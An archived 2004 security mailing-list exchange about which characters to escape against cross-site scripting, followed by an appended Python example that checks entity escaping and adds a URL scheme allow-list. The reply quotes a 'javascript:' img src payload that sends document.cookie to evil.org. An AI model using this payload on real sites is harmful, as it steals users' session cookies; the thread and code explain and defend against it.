WebApp Sec mailing list archives

RE: AppSec FAQ at OWASP


From: "Sangita Pakala" <sangita.pakala () paladion net>
Date: Thu, 29 Jan 2004 15:10:35 +0530

Thank you Ulf for the nice words. To address your question:

Why is it important to escape "(", ")" and "#"?

We need to escape these characters to take care of CSS that does not rely
on <script> tags. For instance, the "javascript:" construct could be
used to embed scripts without using the <script> tag. In the example
below, let's say that the user's input is reflected as the value for
<img src= >. Now, when the img src= line is encountered, the window.open
javascript function is called and the cookie is sent to evil.org.

<img src=
"Javascript:window.open('http://www.evil.org?cookie='+document.cookie)">

Escaping the "(" and ")" above renders the function call moot.

If someone can point me to a good example for when escaping "#" is required,
I'd love to hear that. Gunter Ollmann has an excellent article on CSS
and special characters at http://www.technicalinfo.net/papers/CSS.html

Regards,
Sangita.

Sangita Pakala
Paladion Networks
http://www.paladion.net
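As an added example (not code from the thread or from the OWASP FAQ), the Python below encodes the characters discussed here as numeric entities and then applies the check a practitioner would want: simulating the browser's decoding of entities inside an attribute value shows that &#40; and &#41; are turned back into "(" and ")" before a src or href URL is interpreted, so in that context a scheme allow-list on the value is the defence that actually holds. PAYLOAD, safe_src and the sample URLs are constructed for this example.

```python
import html
import re
from typing import Optional
from urllib.parse import urlsplit

# Constructed payload mirroring the thread's example; not a real site.
PAYLOAD = "Javascript:window.open('http://www.evil.org?cookie='+document.cookie)"


def entity_escape(s: str) -> str:
    """Encode every non-alphanumeric character as a numeric entity.
    This covers '(', ')' and '#' from the thread and everything else."""
    return "".join(c if c.isalnum() else f"&#{ord(c)};" for c in s)


def browser_attr_value(escaped: str) -> str:
    """Approximate what the HTML parser hands to the URL loader: character
    references inside an attribute value are decoded before the URL is used,
    so entity-encoded parentheses come back as literal parentheses."""
    return html.unescape(escaped)


def safe_src(url: str) -> Optional[str]:
    """Allow-list the URL scheme before the value reaches a src/href attribute.
    Returns the entity-escaped value for http(s) URLs, None otherwise.
    Relative URLs are rejected too; widen the allow-list if you need them."""
    # Browsers ignore ASCII control characters and spaces when reading a
    # scheme (so "java\tscript:" still means javascript:); strip them first.
    cleaned = re.sub(r"[\x00-\x20]", "", url)
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme not in ("http", "https"):
        return None
    return entity_escape(cleaned)


if __name__ == "__main__":
    escaped = entity_escape(PAYLOAD)
    # Encoding alone: the parser undoes it inside the attribute value.
    print(browser_attr_value(escaped) == PAYLOAD)   # True
    # Scheme allow-list: the javascript: value never reaches the attribute.
    print(safe_src(PAYLOAD))                        # None
    print(safe_src("https://example.com/logo.png"))
```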


-----Original Message-----
From: Ulf Härnhammar [mailto:Ulf.Harnhammar.9485 () student uu se] 
Sent: Wednesday, January 28, 2004 9:56 PM
To: Sangita Pakala
Cc: webappsec () securityfocus com
Subject: Re: AppSec FAQ at OWASP

Nice document! Good work!

XSS can be prevented while coding the application. You should be
validating all input and output to and from the application and escape
all special characters that may be used in a script. If the code
replaces the special characters by the following before displaying the
output, XSS can be prevented.

(           &#40;
)           &#41;
#           &#35;

Why is it important to escape "(", ")" and "#"?

-- 
Ulf Härnhammar
 student, Uppsala universitet
 editor, idiosynkratisk ( http://labben.abm.uu.se/~ulha9485/idiosynkratisk/ )
